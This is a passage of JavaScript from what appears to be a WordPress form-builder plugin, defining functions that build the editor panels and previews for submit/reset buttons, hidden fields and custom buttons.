	document.getElementById('edit_table').appendChild(div);
}

function type_submit_reset(i, w_submit_title , w_reset_title , w_class, w_act, w_attr_name, w_attr_value){

    document.getElementById("element_type").value = "type_submit_reset";
	delete_last_child();

	var edit_div = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	
	var el_submit_title_label = document.createElement('label');
		el_submit_title_label.setAttribute("class", "fm-field-label");
		el_submit_title_label.setAttribute("for", "edit_for_title");
		el_submit_title_label.innerHTML = "Submit button label";
	
	var el_submit_title_textarea = document.createElement('input');
		el_submit_title_textarea.setAttribute("id", "edit_for_title");
		el_submit_title_textarea.setAttribute("type", "text");
		el_submit_title_textarea.style.cssText = "width:160px";
		el_submit_title_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_submitform_id_temp', this.value)");
		el_submit_title_textarea.value = w_submit_title;
	
	var el_submit_func_label = document.createElement('label');
		el_submit_func_label.setAttribute("class", "fm-field-label");
		el_submit_func_label.innerHTML = "Submit function";
	
	var el_submit_func_textarea = document.createElement('input');
		el_submit_func_textarea.setAttribute("type", "text");
		el_submit_func_textarea.setAttribute("disabled", "disabled");
		el_submit_func_textarea.value = "check_required('submit', 'form_id_temp')";

	var el_reset_title_label = document.createElement('label');
		el_reset_title_label.setAttribute("class", "fm-field-label");
		el_reset_title_label.setAttribute("for", "edit_for_title_textarea");
		el_reset_title_label.innerHTML = "Reset button label";
	
	var el_reset_title_textarea = document.createElement('input');
		el_reset_title_textarea.setAttribute("id", "edit_for_title_textarea");
		el_reset_title_textarea.setAttribute("type", "text");
		el_reset_title_textarea.style.cssText = "width:160px";
		el_reset_title_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_resetform_id_temp', this.value)");
		el_reset_title_textarea.value = w_reset_title;

	var el_reset_active = document.createElement('input');
		el_reset_active.setAttribute("id", "el_reset_active");
		el_reset_active.setAttribute("type", "checkbox");
		el_reset_active.setAttribute("onClick", "active_reset(this.checked, "+i+")");
		if(w_act)
			el_reset_active.setAttribute("checked", "checked");
	
	var el_reset_active_label = document.createElement('label');
		el_reset_active_label.setAttribute("class", "fm-field-label");
		el_reset_active_label.setAttribute("for", "el_reset_active");
		el_reset_active_label.innerHTML = "Display Reset button";
	
	var el_reset_func_label = document.createElement('label');
		el_reset_func_label.setAttribute("class", "fm-field-label");
		el_reset_func_label.setAttribute("for", "el_reset_func_textarea");
		el_reset_func_label.innerHTML = "Reset function";
		
	var el_reset_func_textarea = document.createElement('input');
		el_reset_func_textarea.setAttribute("type", "text");
		el_reset_func_textarea.setAttribute("id", "el_reset_func_textarea");
		el_reset_func_textarea.setAttribute("disabled", "disabled");
		el_reset_func_textarea.value = "check_required('reset')";

	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.style.cssText = "width:200px;";
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");      
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');    
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_submit_reset')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n = w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_submit_reset')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_submit_reset')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_submit_reset')");
			
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	edit_main_td1.appendChild(el_submit_title_label);
	edit_main_td8.appendChild(el_submit_func_label);
	edit_main_td1_1.appendChild(el_submit_title_textarea);
	edit_main_td8_1.appendChild(el_submit_func_textarea);
	
	edit_main_td2.appendChild(el_reset_active_label);
	edit_main_td5.appendChild(el_reset_title_label);
	edit_main_td6.appendChild(el_reset_func_label);
	edit_main_td2_1.appendChild(el_reset_active);
	edit_main_td5_1.appendChild(el_reset_title_textarea);
	edit_main_td6_1.appendChild(el_reset_func_textarea);

	edit_main_td3.appendChild(el_style_label);
	edit_main_td3_1.appendChild(el_style_textarea);
	
	
	edit_main_td4.appendChild(el_attr_label);
	edit_main_td4.appendChild(el_attr_add);
	edit_main_td4.appendChild(br);
	edit_main_td4.appendChild(el_attr_table);
	edit_main_td4.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);

	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_submit_reset");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_submit = document.createElement('button');
		adding_submit.setAttribute("type", 'button');
		adding_submit.setAttribute("class", "button-submit");
		adding_submit.setAttribute("id", i+"_element_submitform_id_temp");
		adding_submit.setAttribute("value", w_submit_title);
		adding_submit.innerHTML = w_submit_title;
		adding_submit.setAttribute("onClick", "check_required('submit', 'form_id_temp');");

	var adding_reset = document.createElement('button');
		adding_reset.setAttribute("type", 'button');
		adding_reset.setAttribute("class", "button-reset");
		if(!w_act)
			adding_reset.style.display = "none";
		adding_reset.setAttribute("id", i+"_element_resetform_id_temp");
		adding_reset.setAttribute("value", w_reset_title );
		adding_reset.setAttribute("onClick", "check_required('reset');");
		adding_reset.innerHTML = w_reset_title;

	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
    
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.style.cssText = 'display:none';
		label.innerHTML = "type_submit_reset_"+i;
	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_submit);
	div_element.appendChild(adding_reset);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
	div.appendChild(div_field);
	div.appendChild(br1);
	main_td.appendChild(div);
	
	change_class(w_class, i);
	refresh_attr(i, 'type_submit_reset');
}
function type_hidden(i, w_name, w_value, w_attr_name, w_attr_value){

    document.getElementById("element_type").value="type_hidden";
	delete_last_child();

	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	
	var el_field_id_label = document.createElement('label');
		el_field_id_label.setAttribute("class", "fm-field-label");
		el_field_id_label.style.cssText = "margin-right: 44px;";
		el_field_id_label.innerHTML = "Field Id";
	
	var el_field_id_input= document.createElement('input');
		el_field_id_input.setAttribute("type", "text");
		el_field_id_input.setAttribute("disabled", "disabled");
		el_field_id_input.setAttribute("value", "wdform_"+i+"_elementform_id_temp");

	var el_field_name_label = document.createElement('label');
	    el_field_name_label.setAttribute("class", "fm-field-label");
	    el_field_name_label.setAttribute("for", "el_hidden_name");
		el_field_name_label.innerHTML = "Field Name";
	
	var el_field_name_input= document.createElement('input');
		el_field_name_input.setAttribute("type", "text");
		el_field_name_input.setAttribute("value", w_name);
		el_field_name_input.setAttribute("id", "el_hidden_name");
		el_field_name_input.setAttribute("onKeyPress", "return check_isspacebar(event)");
		el_field_name_input.setAttribute("onChange", "change_field_name('"+i+"', this)");

	var el_field_value_label = document.createElement('label');
		el_field_value_label.setAttribute("class", "fm-field-label");
		el_field_value_label.setAttribute("for", "el_hidden_value");
		el_field_value_label.style.cssText = "margin-right: 22px;";
		el_field_value_label.innerHTML = "Field Value";
	
	var el_field_value_input= document.createElement('input');
		el_field_value_input.setAttribute("type", "text");
		el_field_value_input.setAttribute("id", "el_hidden_value");
		el_field_value_input.setAttribute("value", w_value);
		el_field_value_input.setAttribute("onKeyUp", "change_field_value('"+i+"', this.value)");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var hr = document.createElement('hr');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	edit_main_td1.appendChild(el_field_id_label);
	edit_main_td1.appendChild(el_field_id_input);
	edit_main_td2.appendChild(el_field_name_label);
	edit_main_td2.appendChild(el_field_name_input);
	edit_main_td3.appendChild(el_field_value_label);
	edit_main_td3.appendChild(el_field_value_input);
	
	
	
	edit_main_td4.appendChild(el_attr_label);
	edit_main_td4.appendChild(el_attr_add);
	edit_main_td4.appendChild(br3);
	edit_main_td4.appendChild(el_attr_table);
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
	element='input';	type='hidden';  
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_hidden");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding = document.createElement(element);
		adding.setAttribute("type", type);
		adding.setAttribute("value", w_value);
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("name", w_name);

	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.cssText = 'display:table-cell; padding-left: 7px;';
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
    
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.style.cssText = 'display:none';
		label.innerHTML = w_name;
  
	var label_hidden = document.createElement('span');
		label_hidden.style.cssText = 'color:red; font-size:13px;';
		label_hidden.innerHTML = 'Hidden field';
		
		
	var div_hidden_name = document.createElement('div');
		
	var span_hidden_name_label = document.createElement('span');
		span_hidden_name_label.setAttribute("align", 'left');
		span_hidden_name_label.innerHTML = 'Name: ';	
		
	var span_hidden_name = document.createElement('span');
		span_hidden_name.setAttribute("align", 'left');
		span_hidden_name.innerHTML = w_name;	
		span_hidden_name.setAttribute("id", i+"_hidden_nameform_id_temp");	
	
	var div_hidden_value = document.createElement('div');

	var span_hidden_value_label = document.createElement('span');
		span_hidden_value_label.setAttribute("align", 'left');
		span_hidden_value_label.innerHTML = 'Value: ';	
		
	var span_hidden_value = document.createElement('span');
		span_hidden_value.setAttribute("align", 'left');
		span_hidden_value.innerHTML = w_value;	
		span_hidden_value.setAttribute("id", i+"_hidden_valueform_id_temp");	
		
	div_hidden_name.appendChild(span_hidden_name_label);
	div_hidden_name.appendChild(span_hidden_name);
	div_hidden_value.appendChild(span_hidden_value_label);
	div_hidden_value.appendChild(span_hidden_value);
      
	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_label.appendChild(label_hidden);
	div_element.appendChild(adding);
	div_element.appendChild(adding_type);
	div_element.appendChild(div_hidden_name);
	div_element.appendChild(div_hidden_value);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);
	refresh_attr(i, 'type_text');
}

function type_button(i, w_title , w_func , w_class, w_attr_name, w_attr_value){
	
	document.getElementById("element_type").value="type_button";
	delete_last_child();

	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.setAttribute("id", "buttons");
		edit_main_td4.setAttribute("colspan", "2");
	
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');

	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
				
	var el_choices_add_label = document.createElement('label');
		el_choices_add_label.setAttribute("class", "fm-field-label");
		el_choices_add_label.innerHTML = "Add a new button&nbsp;";
		
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_button("+i+")");
	
				
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
				el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                
				el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_style_label);
	edit_main_td1_1.appendChild(el_style_textarea);
	
	edit_main_td2.appendChild(el_attr_label);
	edit_main_td2.appendChild(el_attr_add);
	edit_main_td2.appendChild(br3);
	edit_main_td2.appendChild(el_attr_table);
	edit_main_td2.setAttribute("colspan", "2");
	
	edit_main_td3.appendChild(el_choices_add_label);
	edit_main_td3_1.appendChild(el_choices_add);
	
	n=w_title.length;
	for(j=0; j<n; j++)
	{	
		var table_button = document.createElement('table');
			table_button.setAttribute("width", "100%");
			table_button.setAttribute("border", "0");
			table_button.setAttribute("id", "button_opt"+j);
			table_button.setAttribute("idi", j+1);
		var tr_button = document.createElement('tr');
		var tr_hr = document.createElement('tr');
		
		var td_button = document.createElement('td');
		var td_X = document.createElement('td');
		var td_hr = document.createElement('td');
		    td_hr.setAttribute("colspan", "3");
		tr_hr.appendChild(td_hr);
		tr_button.appendChild(td_button);
		tr_button.appendChild(td_X);
		table_button.appendChild(tr_hr);
		table_button.appendChild(tr_button);
		
		var br1 = document.createElement('br');
		
		var hr = document.createElement('hr');
		hr.setAttribute("id", "br"+j);


		var el_title_label = document.createElement('label');
			el_title_label.setAttribute("class", "fm-field-label");
			el_title_label.setAttribute("for", "el_title"+j);
			el_title_label.innerHTML = "Button name";
		
		var el_title = document.createElement('input');
			el_title.setAttribute("id", "el_title"+j);
			el_title.setAttribute("type", "text");
			el_title.setAttribute("value", w_title[j]);
			el_title.style.cssText = "width:140px; margin-left:33px;";
